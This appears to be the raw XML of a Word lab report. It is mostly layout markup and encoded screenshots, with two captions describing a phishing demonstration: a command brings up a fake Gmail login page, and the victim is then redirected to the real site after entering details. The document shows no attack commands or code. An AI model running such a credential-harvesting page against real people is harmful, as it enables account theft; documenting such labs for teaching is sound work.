+Py&#10;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&#10;qXhPyVJmHAwskmQOOs/0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XxZzV4QMAAB4KAAAOAAAAAAAAAAAAAAAAAD0CAABkcnMvZTJvRG9jLnhtbFBLAQItAAoA&#10;AAAAAAAAIQCw+3+KSmUBAEplAQAUAAAAAAAAAAAAAAAAAEoGAABkcnMvbWVkaWEvaW1hZ2UxLmpw&#10;Z1BLAQItABQABgAIAAAAIQDbuptA3AAAAAUBAAAPAAAAAAAAAAAAAAAAAMZrAQBkcnMvZG93bnJl&#10;di54bWxQSwECLQAUAAYACAAAACEAN53BGLoAAAAhAQAAGQAAAAAAAAAAAAAAAADPbAEAZHJzL19y&#10;ZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYAAAAABgAGAHwBAADAbQEAAAA=&#10;">
                <v:rect id="Rectangle 6515" o:spid="_x0000_s1396" style="position:absolute;left:59192;top:32363;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3TxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvC/6H8Bb2tqYKil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LZD3TxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="78A15583" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 6533" o:spid="_x0000_s1397" type="#_x0000_t75" style="position:absolute;left:127;top:127;width:58737;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LhxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvBf9DeIK3mq3Sbd0apQRE6UXcevH22LzuLt28LEmqq7++KQg9DjPzDbNcD7YTZ/KhdazgaZqB&#10;IK6cablWcPzcPL6CCBHZYOeYFFwpwHo1elhiYdyFD3QuYy0ShEOBCpoY+0LKUDVkMUxdT5y8L+ct&#10;xiR9LY3HS4LbTs6yLJcWW04LDfakG6q+yx+r4AM3fj/TWufZFg/bxcnfjvpFqcl4eH8DEWmI/+F7&#10;e2cU5M/zOfy9SU9Arn4BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAHWwi4cYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId143" o:title=""/>
                </v:shape>
                <v:shape id="Shape 6534" o:spid="_x0000_s1398" style="position:absolute;width:58991;height:33204;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5899150,332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UwxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9fa8JA&#10;EMTfC/0Oxwq+1YtVQ0k9RQpKH/3T4uuSWy/B3F6aPTV++16h4OMwM79h5sveN+pKndSBDYxHGSji&#10;MtianYGvw/rlDZREZItNYDJwJ4Hl4vlpjoUNN97RdR+dShCWAg1UMbaF1lJW5FFGoSVO3il0HmOS&#10;ndO2w1uC+0a/ZlmuPdacFips6aOi8ry/eAOrex7Wx965n3LDctod5Xt7FmOGg371DipSHx/h//an&#10;NZDPJlP4e5OegF78AgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAC3h5TDEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,3320415r5899150,l5899150,,,,,3320415xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3320415"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D28F42F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">On executing the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> you can see the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>gmail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> login gets prompted </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772C61DF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB3AE0E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251736064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="279EADBF" wp14:editId="0D7C3874">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="44094" name="Group 44094"/>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20" name="Shape 501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1" name="Shape 501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2" name="Shape 501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3" name="Shape 501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4" name="Shape 501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94" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50125" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50126" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50127" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50128" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 5012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37088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="718E793A" wp14:editId="01CDA407">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="44095" name="Group 44095"/>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30" name="Shape 501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1" name="Shape 501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32" name="Shape 501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3" name="Shape 501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34" name="Shape 501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95" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50135" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50136" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50137" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50138" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 5013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sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">After filling up the details redirected to main website </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14294DA5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24"/>
        <w:ind w:left="40" w:right="-181"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="491A610E" wp14:editId="140A3EFE">
                <wp:extent cx="5961279" cy="3385461"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="44093" name="Group 44093"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5961279" cy="3385461"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5961279" cy="3385461"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6521" name="Rectangle 6521"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5919216" y="3236261"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="08983742"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536" name="Picture 6536"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId144"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="12700" y="12700"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="6537" name="Shape 6537"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>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A610E" id="Group 44093" o:spid="_x0000_s1399" style="width:469.4pt;height:266.55pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59612,338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XFqc2gMAAB4KAAAOAAAAZHJzL2Uyb0RvYy54bWy8Vm1v2zYQ/j5g&#10;/0HQ90aWHb9IiF0MzRoUGNag7X4ATVGWMIokSPptv353R1J2k3QZMmABIh/Ju+NzD++OvHt/GmR2&#10;ENb1Wq3z8maSZ0Jx3fRqt87/+Pbx3SrPnGeqYVIrsc7PwuXvNz//dHc0tZjqTstG2AycKFcfzTrv&#10;vDd1UTjeiYG5G22EgsVW24F5GNpd0Vh2BO+DLKaTyaI4atsYq7lwDmbvw2K+If9tK7j/3LZO+Eyu&#10;c8Dm6Wvpu8Vvsblj9c4y0/U8wmBvQDGwXsGmo6t75lm2t/0zV0PPrXa69TdcD4Vu254LigGiKSdP&#10;onmwem8oll193JmRJqD2CU9vdst/PzxY89U8WmDiaHbABY0wllNrB/wFlNmJKDuPlImTzzhMzqtF&#10;OV1WecZhbTZbzW8XZSCVd8D8Mzve/fqKZZE2Lr6DczSQIO7CgftvHHztmBFErauBg0eb9c06X8yn&#10;ZZ4pNkCmfoHcYWonRUazRA/pjmS52gFvLzA1r8pqWi7yDDmZzhbTxMnI2ry6nQXOymp1O1sgZWPg&#10;rDbW+QehhwyFdW4BCmUXO/zmfFBNKri9VPhV+mMvZVjFGeAvIUTJn7YnCrJczXE7nNvq5gyhd9r+&#10;9RmKuJX6uM51lHKsa9gdV/NMflJAOZZQEmwStkmwXn7QVGgBzy97r9ueAF92i8DgLDd3puc1/MfE&#10;BunZob7eAMDK763Io5PhX/kYmP1zb95BDRrm+20ve3+mfgI0Iyh1eOw5ni0OrvMDjirmByjgvpAd&#10;4fiSJtrhIeD4Ozdb2Rs8IeQG5QgYmtGTYn4h5tAo7jXfD0L50PmskIBdK9f1xuWZrcWwFZDE9lMT&#10;S9B5KzzvcMMWNsaMDukxLhDKCzDE/IOchiqfwOlDRgcJHLF6zOfVcracw3LoApNZNaEce2tKE6wA&#10;hETAFRL2f+gAs2U6YeoReL7LVC+QCa9Xf2ApXi0XhqqqvDA0rWbPGOL7UPRIbCp0uFCaUPIw1yWJ&#10;n1QSsTX8490G+Y126BTFDAp8vopYOmzZAQquD1D53zRp+kvjThohcy46Ul3rjj7pGrgOL+mlX0O+&#10;r/WJKkiVpJF+g+YVnVc6XGonAiQMi7rnGCroXZMpFUY9nd9iAnMGr4wWKocaKlywqgluXmiZzp+l&#10;QD6k+iJaaJ5w4ZVk5+xu+0Ha7MCw3dFfbOGkijah4qLV5IdWqMqk6Vj0Fd3EDSiu6Ak1BT1pRjDR&#10;LY9owrsGXgcQZ3rdABejEcHSyo/2Ct5ktCFdFSHaS6dGXnBErZpuY3iEEKL4YMJXzvWY9C/Pus3f&#10;AAAA//8DAFBLAwQKAAAAAAAAACEA4MFGQoOoAQCDqAEAFAAAAGRycy9tZWRpYS9pbWFnZTEuanBn&#10;/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsK&#10;CwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAARCAIeA8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I+I/&#10;7SNv4YXWbfS7vRxc6a8lvLcX048uC4j8z93JHHJ5n/PP/v5XK/AP9pbxd8TvihBo1/H4ZvfD9xZz&#10;zxaloiXHmCSPy/3b+ZIeea+Tf2gvBPja8+K/jo6d4N8QX+myeIX1HNtplxJHeR/u/wDpn/0zr0L9&#10;gvwf4h8K/Fm3tbrwf4j0fTvsl5JJfatYSW8fmfu/LjrP95c+u/s3A08D7adT95OHP8X/AJKfojZa&#10;7Y30kkcE/myR/wCs/wBinR6tBJqM1om7z4eH+T2Q/wDs4rmLfwZcQ/aoPOhudPu53uJYJF/j8wnr&#10;/wB+/wDv3VvQ/B82m6xHdyXSSRxweV5UY/6Zxx/+060PkToI7+ORowgb5y6fd/uGrn8Fcte+E5r6&#10;0+zu8IRWn2cdpP8A9dZ+reAJ5ftv9nzw2sc9v9njj8v7n+r/APjdAHX3t1DZ2sk88nlxQp5jyelU&#10;LfxBY3FwkMcz+a8nlgPG+d/l+Zj/AL4rK/4Ruex0bXo45PtD3UcggjT+H7/7sfnVZfB91eRyTNP5&#10;TzySF45DvKRvB5f/AH30oA7moZZfLjrldQ8ItrUlzJex2snmSPJ5ZG/rHHH/AO06p2Xw9e0ura48&#10;+H7R57yzyeX/AKzMkcn/ALToA7aoPt0DX0lp5g+0InmGP/Yrhb7wZHpy2k21XjWSOW6t47RpPtH+&#10;sHz/APfzPP8Acq54B0G60e5BntfsyfZfLH/gRJJ/7UoA7S5uorKHzJn8tB3qpY6pBfySJE/7yHiS&#10;ORCjpUd9pfnWflxSeW6yRyZk+f7knmVi33hFtS1yPUrl4RJGY/Lj8vzPL2JJ/wDHKAOwqpa30d9b&#10;xzwv+7euR03wS1tb+XPHZ3Ft5nmPb4/dOdmPMqzpfg1rPVre7mnMv2eNIoxv+5hMGgDVvPEFhYxi&#10;aafCl5I87P8AnnnzP/QDU0evWE0tnGlxGZL2PzIB/fSse68KvNqOqTrcosF3A8aRbOY5XGzfUmne&#10;EY9LvvPSUPEk++GPp5aYkPlj/gchoA0T4isY495n48/7N9z/AJaVoNdQLPHCZAJHHypXJ634H/tW&#10;81GeOeOMXdpJEkez/V3Dx+X5n/fHFSXHge3lYulva/aX+1/vPL/560AdhWLHr+nzSxqk/Mn3Pk+v&#10;/wAQawfEHg2+1zzQZ7ePe/mxx7T+7k/dfvP/AByT/v5Uk3hO6WNI47po5f3f+kb/ALnzyHhP+2lA&#10;HZeYvrTq4CH4fvBaokLW1l+7jQm3Rvn2Hnv/AB/5zXc28Xkx7KAJqKKKACiiigAooooAKKKKACii&#10;igAooooAKKKKACiiigAooooAKKKKACiiigAoopKAKdzaxXlvJDNH5kcg2OlcWvwT8E9B4X03Z/17&#10;R13mPejb71pGc6fwM5p0adX44HBf8KW8D/8AQsaV/wCA0dH/AApbwP8A9CxpX/gNHXeeXSeX9Kv2&#10;9b+cy/s/C/yHCr8F/AvfwxpZ/wC3aOtrQfA2g+GbeWPSdKtbKOf55I4Y9m810e0Up+tZzrVJ/bNY&#10;YWhT+CBU/syz/wCfSP8A74p39m2n/PtH/wB8VcoqDpKf9m2n/PtH/wB8Uf2baf8APtH/AN8VcooA&#10;p/2baf8APtH/AN8Uf2baf8+0f/fFXKKAKf8A